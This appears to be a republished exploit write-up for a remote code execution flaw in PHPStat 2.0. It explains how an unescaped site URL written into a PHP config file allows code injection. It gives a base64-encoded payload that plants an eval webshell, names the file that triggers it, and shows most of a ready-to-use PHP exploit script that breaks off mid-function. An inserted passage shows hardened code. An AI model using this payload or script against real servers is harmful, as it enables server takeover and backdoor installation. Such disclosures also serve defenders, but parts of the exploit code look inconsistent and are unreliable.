PHPStat 2.0 Remote Code Execution Vulnerability

Source: Internet
Author: User

Flyh4t [Wolvez.org]

PHPStat is a commercial website traffic statistics system that offers website log analysis, site data analysis and user behaviour analysis, and presents customers with in-depth cross-site traffic reports. Its analysis of visitor behaviour, network marketing and website decision support is meant to give customers the real, valuable information behind the data together with actionable recommendations. The developer, puaisi, positions itself as the most professional website data analysis technology provider in China. The code is indeed well written, but its security is very poor and vulnerabilities are everywhere; a website running PHPStat statistics can be compromised by hackers in seconds.

Most of the code in this system is Zend-encrypted. After decrypting it, let us look at the code in user_info.php through which an ordinary user modifies a statistics website (the code for creating a website is similar):


```php
......
// build the per-website configuration file as PHP source
$FileStr .= "<?\nif(!defined('WEB_HOME')) exit('Access Denied');\n";
$FileStr .= "if(file_exists('../count/exclusion/website_'.\$websiteid.'_regexp.php'))\n";
$FileStr .= "include_once '../count/exclusion/website_'.\$websiteid.'_regexp.php';\n";
$FileStr .= "// website address being counted\n";
// the user-supplied site URL is spliced into a double-quoted PHP string
$FileStr .= "\$siteurl = \"".$_POST['site']."\";\n";
$FileStr .= "// list of IP addresses excluded by the program\n";
......
$FileStr .= "\$mainsitecode = \"".$Tmp['sitegroup']."\";\n";
$FileStr .= "?>";
if(!file_exists(COUNT_DIRNAME."/exclusion/website_".$Tmp['website'].".php"))
{
    write_to_file(COUNT_DIRNAME."/exclusion/website_".$Tmp['website'].".php", $FileStr, "w+");
}
......
```

If the website number added by an ordinary user is 100003, the configuration file is count/exclusion/website_3.php, and its content looks like this:


```php
<?
if(!defined('WEB_HOME')) exit('Access Denied');
if(file_exists('../count/exclusion/website_'.$websiteid.'_regexp.php'))
include_once '../count/exclusion/website_'.$websiteid.'_regexp.php';

// website address being counted
$siteurl = "http://127.0.0.1";

// list of IP addresses excluded by the program

// list of directories included by the program

// code of the main site the program belongs to
$mainsitecode = "50";
?>
```

The submitted siteurl is written into the PHP file enclosed in double quotation marks. Anyone familiar with PHP will see the problem: inside double quotes PHP interpolates variables and `${...}` expressions, so a specially constructed siteurl is both written to the file and executed when the file is included. The constructed siteurl is as follows:


```
http://${${fputs(fopen(base64_decode(ZmwucGhw),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2FdKTsgPz4x))}}
```

This writes `<?php @eval($_POST[a]); ?>1` into the file fl.php. Encoding the strings with base64 avoids single quotes, so magic_quotes_gpc need not be considered. Note: as long as the encoded string contains no special characters such as + or =, the argument to base64_decode needs no single or double quotes at all.

One problem remains: the line at the top of the file, if(!defined('WEB_HOME')) exit('Access Denied');, prevents us from triggering this small shell directly. We must find a file that defines WEB_HOME and includes the configuration file. PHPStat provides several such files. Let us read part of the code in templates/ms/common/op.php, which can be accessed directly:


```php
<?
session_start();
include_once '../../include.inc/config.inc.php';
include_once '../../include.inc/function.php';
include_once '../include.inc/function_pagerank.php';
include_once '../include.inc/global.inc.php';
include_once '../include.inc/conn.db.inc.php';
include_once '../include.inc/pdo_page.inc.php';
include_once '../parse_site.php';

$website = strtolower(strval($_GET['website']));
$action = strtolower(strval($_GET['action']));
$websiteid = $website;
$QueryLimit = new queryLimit();
if(strval($_GET['showtype']) == 'all') $website = $website."&showtype=all";

// the per-website configuration file is included here, so our code is triggered at this point
include_once "../".COUNT_DIRNAME."/exclusion/website_".$websiteid.".php";
```

That concludes the analysis. The exploit below is provided for study.
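From the defender's side, the two defects above are that untrusted input is spliced into generated PHP source, and that a request parameter selects which file is included. As an added example (not PHPStat's code; function names are hypothetical), the following shows the vulnerable writer beside a hardened one that emits the value as a PHP literal via var_export(), plus an include guard that only accepts a numeric website id:

```php
<?php
// Added example, not PHPStat code. Hardened replacements for the two
// patterns discussed above; function names are hypothetical.

// Vulnerable pattern (as in user_info.php): the value lands inside a
// double-quoted PHP string, where "${...}" is interpolated when the
// generated file is later included.
function buildConfigVulnerable($siteurl) {
    return "<?php\n\$siteurl = \"" . $siteurl . "\";\n";
}

// Hardened: reject anything that is not a URL, then let var_export() emit
// a single-quoted PHP literal. Embedded quotes and backslashes are escaped,
// so the stored value is data and can never be parsed as code.
function buildConfigSafe($siteurl) {
    if (!filter_var($siteurl, FILTER_VALIDATE_URL)) {
        throw new InvalidArgumentException('siteurl must be a valid URL');
    }
    return "<?php\n\$siteurl = " . var_export($siteurl, true) . ";\n";
}

// Hardened include: accept only a numeric id and build the path from the
// integer, so a request parameter can never name an arbitrary file.
function exclusionConfigPath($countDir, $websiteParam) {
    if (!ctype_digit((string)$websiteParam)) {
        return null;
    }
    return $countDir . '/exclusion/website_' . (int)$websiteParam . '.php';
}

// Constructed sample inputs.
$benign = 'http://127.0.0.1';
echo buildConfigVulnerable($benign);            // $siteurl = "http://127.0.0.1";
echo buildConfigSafe($benign);                  // $siteurl = 'http://127.0.0.1';
var_dump(exclusionConfigPath('count', '3'));    // "count/exclusion/website_3.php"
var_dump(exclusionConfigPath('count', '../x')); // NULL, request is refused
```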


```php
<?php
print_r('
+---------------------------------------------------------------------------+
PHPStat 2.0 remote code execution exploit
by Flyh4t
+---------------------------------------------------------------------------+
');
if ($argc < 3) {
    print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' host path website
Example: php '.$argv[0].' localhost /PHPStat2/ 100001
+---------------------------------------------------------------------------+
');
    exit;
}
error_reporting(7);
ini_set('max_execution_time', 0);
$host = $argv[1];
$path = $argv[2];
$website = $argv[3];
$websiteid = $website - 100000;
$cookie = 'PHPStatCookie=PHPStat; PHPStatUser=flyh4t; PHPSESSID=16971168032f872c76a4bfe99bc9ee7a';
// POST body for user_info.php; single quotes keep the ${...} payload literal here
$cmd = 'sitename=flyh4t&website='.$website.'&sitedes=flyh4t&site=http%3A%2F%2F${${fputs(fopen(base64_decode(ZmwucGhw),w),base64_decode(Signature))}}&websitetype=%D7%DB%BA%CF%C3%C5%BB%A7&siteshow=0&siterank=0&sitetype=0&exclusionip=&exclusioninter=&action=updatesite&websiteid='.$websiteid;
$shell = 'http://'.$host.$path.'templates/MS/common/fl.php';
send1($cmd);
send2();
if (!file_get_contents($url) && file_get_contents($shell) == 1)
    exit("Exploit Success! View your shell: $shell");
else
    exit("Exploit Failed!");

function send1($cmd)
{
    global $host, $path, $website, $cookie;
    $message = "POST ".$path."user_info.php?action=editsite&website=$website HTTP/1.1\r\n";
    $message .= "Accept: */*\r\n";
    $message .= "Referer: http://$host$path\r\n";
    $message .= "Accept-Language: zh-cn\r\n";
    $message .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
    $message .= "Host: $host\r\n";
    $message .= "Content-Length: ".strlen($cmd)."\r\n";
    $message .= "Connection: Close\r\n";
    $message .= "Cookie: $cookie\r\n\r\n";
    $message .= $cmd;
    $fp = fsockopen($hos
```
